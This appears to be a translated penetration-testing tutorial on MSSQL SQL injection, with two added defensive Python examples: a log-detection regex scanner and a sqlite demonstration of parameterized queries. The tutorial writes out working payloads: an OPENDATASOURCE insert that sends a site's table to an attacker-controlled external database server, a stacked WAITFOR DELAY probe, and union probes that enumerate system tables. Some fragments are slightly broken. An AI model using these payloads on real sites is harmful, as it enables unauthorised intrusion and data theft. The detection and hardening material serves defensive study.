1. What is MSSQL
MSSQL refers to Microsoft's SQL Server database server; MYSQL can be described as a simplified version of MSSQL. MYSQL is generally used with PHP websites, is suited to small and medium-sized sites, and is open source. MSSQL is currently used by large websites, usually commercial ones; because it is developed by Microsoft it is licensed and more expensive.
Basic syntax differences between MSSQL and MYSQL (only the syntax commonly used in penetration testing):
MYSQL:
1. ';' is used as the end of a statement.
2. '\' is used for escaping.
3. Built-in system databases: mysql, information_schema, performance_schema, sys.
4. Query the current database name: database().
5. View table names: tables.
MSSQL:
1. ';' is optional (it may be written or omitted), but MSSQL provides the go keyword as the end of a batch of statements.
2. In SQL Server there is no need to escape; when a name is ambiguous, just quote it.
3. Built-in system databases: Master, Model, Msdb, Tempdb.
4. Query the current database name: db_name().
5. View table names: sysobjects.
2. Principle
Make the target database server insert the information it retrieves into a database controlled by the penetration tester.
3. Injection conditions
a. The target must be able to reach the external network.
b. The database that receives the inserted data must be reachable on a public IP.
4. Injection steps
a. Rebound injection
1. Build an MSSQL environment
   /* It is unrealistic to build an MSSQL environment yourself: first of all you need a public IP, because only with a public IP can the queried data be inserted into our database. Here you can apply for free hosting to help build an MSSQL environment, for example Alwaysdata, ProFreeHost, * Cloud, etc. */
2. Connect to the public database
   -- Use the Navicat database management tool to connect; the connection name is arbitrary and the host is the local address.
3. Determine whether stacked injection exists
   ;select name from sysobjects waitfor delay '00:00:05:00' -- if the website's response is delayed, stacked injection exists
4. Create a new table in the connected database to store the data
5. Rebound injection
   -- Use the opendatasource function to perform rebound injection.
   OPENDATASOURCE(provider_name, init_string)
   /* provider_name is the PROGID of the OLE DB provider used to access the data source.
      init_string is the connection address, port, user name, password and database name:
      server=connection address,port;uid=user name;pwd=password;database=database name */
   -- For example:
   insert into opendatasource('sqloledb','server=den1.,1433;uid=0;pwd=0;database=admin'). select * from admin -- qwe
   /* insert into is the statement's type: it is an insert statement.
      opendatasource('sqloledb','server=den1.,1433;uid=0;pwd=0;database=admin'). indicates where the queried content is inserted.
      select * from admin is the content to be queried, i.e. the data */
b. Joint query injection
(1) Use regular SQL injection to determine the number of fields.
(2) Determine the display positions
Since MSSQL syntax is stricter than MYSQL's, you cannot simply fill in numbers to find the display positions. In MYSQL, union only needs the same number of fields, but in MSSQL, if the type of a filler value does not match the column type in the database, no data is displayed. Moreover, for MSSQL joint queries it is best to use union all. If you do not know the type, you can fill in 'null'.
' union all select 'null','null','null' --s1
Then replace the nulls with numbers one by one to determine the type of each column.
At this point you can tell that it is an MSSQL database, so the next step cannot simply continue to query the data with the usual SQL injection syntax.
(3) Check the table names
Use MSSQL's sysobjects to get the user-created tables (xtype='U' selects user tables):
' union all select id,name,'null' from sysobjects where xtype='U' --s2
(4) Check the field names
' union all select 'null',name,'null' from where id=··· ··· --s3
(5) Check the field contents
' union all select field name,field name,field name from table name --q
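Both the rebound injection steps in section 4a and the joint query probes above depend on a few keywords that a web server or WAF log will contain, which makes them straightforward to flag. The following Python script is an added example for this page, not code from the original article; it runs a handful of constructed request parameter values (not captured traffic; the host 203.0.113.10 is a documentation-range placeholder) through simple rules for each primitive used above: a stacked WAITFOR DELAY probe, an OPENDATASOURCE or OPENROWSET call carrying a connection string, and union all probes against sysobjects or syscolumns or with 'null' fillers.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request parameter values (not captured traffic). The host
# 203.0.113.10 is a documentation-range placeholder, not a real server.
SAMPLE_REQUESTS = [
    ("r1", "1"),
    ("r2", "1;select name from sysobjects waitfor delay '00:00:05'--"),
    ("r3", "1;insert into opendatasource('sqloledb','server=203.0.113.10,1433;"
           "uid=u;pwd=p;database=admin'). select * from admin--"),
    ("r4", "' union all select 'null','null','null' --"),
    ("r5", "' union all select id,name,'null' from sysobjects where xtype='U' --"),
    ("r6", "1%3Bselect+name+from+sysobjects+waitfor+delay+%2700%3A00%3A05%27--"),
    ("r7", "O'Brien"),
]

# Each rule names one primitive from the article; list order fixes output order.
RULES = [
    # statement terminator followed by a time-based probe (stacked query check)
    ("stacked_time_delay",
     re.compile(r";\s*(select|waitfor)\b.*\bwaitfor\s+delay\b", re.I | re.S)),
    # ad hoc remote data source call used for the out-of-band ("rebound") write
    ("oob_opendatasource", re.compile(r"\bopen(datasource|rowset)\s*\(", re.I)),
    # OLE DB init string carrying a remote server address and credentials
    ("oob_init_string", re.compile(r"server\s*=\s*[^;']+;\s*uid\s*=", re.I)),
    # union probe reading MSSQL metadata tables
    ("union_metadata_probe",
     re.compile(r"\bunion\s+(all\s+)?select\b.*\bfrom\s+sys(objects|columns)\b", re.I | re.S)),
    # union probe with 'null' fillers used to find display positions
    ("union_null_probe", re.compile(r"\bunion\s+(all\s+)?select\b.*'null'", re.I | re.S)),
]


def normalize(value):
    """URL-decode and collapse whitespace so the rules see the SQL the server would."""
    return re.sub(r"\s+", " ", unquote_plus(value)).strip()


def classify(value):
    """Return the names of every rule that matches one parameter value."""
    text = normalize(value)
    return [name for name, rx in RULES if rx.search(text)]


def scan(requests):
    """Map request id -> matched rule names for a list of (id, parameter) pairs."""
    return {req_id: classify(value) for req_id, value in requests}


def flagged(requests):
    """Only the requests that triggered at least one rule."""
    return {req_id: hits for req_id, hits in scan(requests).items() if hits}


if __name__ == "__main__":
    for req_id, hits in flagged(SAMPLE_REQUESTS).items():
        print(req_id, hits)
```

The rules are deliberately narrow so that a value like O'Brien (r7) is not flagged; they are a starting point for alerting, not a substitute for parameterized queries. On the server side, OPENDATASOURCE and OPENROWSET against ad hoc connections only work when the SQL Server option Ad Hoc Distributed Queries is enabled, so its value in sys.configurations is worth checking as part of hardening.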
5. Supplement
Rebound injection is used to get around blind injection, WAF interception of the response, and cases where rapid access is blocked.
Stacked injection:
a. Principle
In SQL, a semicolon (;) marks the end of a statement. Imagine that, after ending one SQL statement, we construct the next one: will it be executed together with the first? This idea is what produces stacked injection. Union injection also merges two statements, so what is the difference between the two? The statement types that union or union all can execute are limited to queries, whereas stacked injection can execute arbitrary statements.
b. Limitations
(1) The limitation of stacked injection is that it cannot be executed in every environment; it may be restricted by an API or database engine that does not support it.
(2) Stacked queries can execute arbitrary SQL statements, but this injection method is not perfect. In a web system the code usually returns only one query result, so the second statement of a stacked injection either raises an error or has its result ignored, and we cannot see the returned result in the front-end interface.
(3) Before using stacked injection we also need to know some database-related information, such as table names and column names.
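Limitation (1) above, that whether a stacked statement runs depends on the API, can be shown on a stand-in engine, together with the hardened form that makes the question moot. The following Python example is added here and is not from the original article; it uses the standard-library sqlite3 module in place of MSSQL (an assumption: the engine differs, but the API behaviour is what matters) and feeds one constructed stacked payload into three ways of issuing the same lookup: string concatenation through execute(), which accepts only one statement per call and rejects the stacked one; string concatenation through executescript(), which runs every statement so the appended INSERT takes effect; and a parameterized query, which treats the whole input as a single value.

```python
import sqlite3

# Constructed sample input: a stacked payload that appends a second statement
# to an id parameter. SQLite (Python's built-in sqlite3 module) stands in for
# MSSQL here; the API behaviour is the point, not the engine.
STACKED_INPUT = "1; INSERT INTO accounts(name) VALUES ('injected'); --"


def fresh_db():
    """New in-memory database with one table and one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts(id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO accounts(name) VALUES ('alice')")
    conn.commit()
    return conn


def row_count(conn):
    """Number of rows in accounts; rises to 2 only if the injected INSERT ran."""
    return conn.execute("SELECT COUNT(*) FROM accounts").fetchone()[0]


def lookup_concat_execute(conn, user_id):
    """Vulnerable string concatenation through an API that runs a single
    statement per call: the stacked statement is rejected, not executed."""
    sql = "SELECT name FROM accounts WHERE id = " + user_id
    try:
        return "ok", conn.execute(sql).fetchall()
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # "You can only execute one statement at a time."; older Python
        # versions raise sqlite3.Warning for the same condition.
        return "rejected", []


def lookup_concat_executescript(conn, user_id):
    """Same concatenation through an API that runs every statement in the
    string: the appended INSERT executes. Returns nothing; check row_count()."""
    conn.executescript("SELECT name FROM accounts WHERE id = " + user_id)


def lookup_parameterized(conn, user_id):
    """Hardened form: the whole input is bound as one value, so the semicolon
    and the second statement are just characters compared against id."""
    return conn.execute("SELECT name FROM accounts WHERE id = ?", (user_id,)).fetchall()


def run_demo(payload=STACKED_INPUT):
    """Run the payload through all three call styles on fresh databases."""
    results = {}
    conn = fresh_db()
    status, _ = lookup_concat_execute(conn, payload)
    results["execute"] = (status, row_count(conn))
    conn = fresh_db()
    lookup_concat_executescript(conn, payload)
    results["executescript"] = row_count(conn)
    conn = fresh_db()
    results["parameterized"] = (lookup_parameterized(conn, payload), row_count(conn))
    return results


if __name__ == "__main__":
    for call_style, outcome in run_demo().items():
        print(call_style, outcome)
```

The executescript() path is the situation the article describes: the application never sees a result from the second statement, yet it ran. Whether a production driver behaves like execute() or like executescript() is a property of the driver and server configuration, which is why only the parameterized form should be relied on.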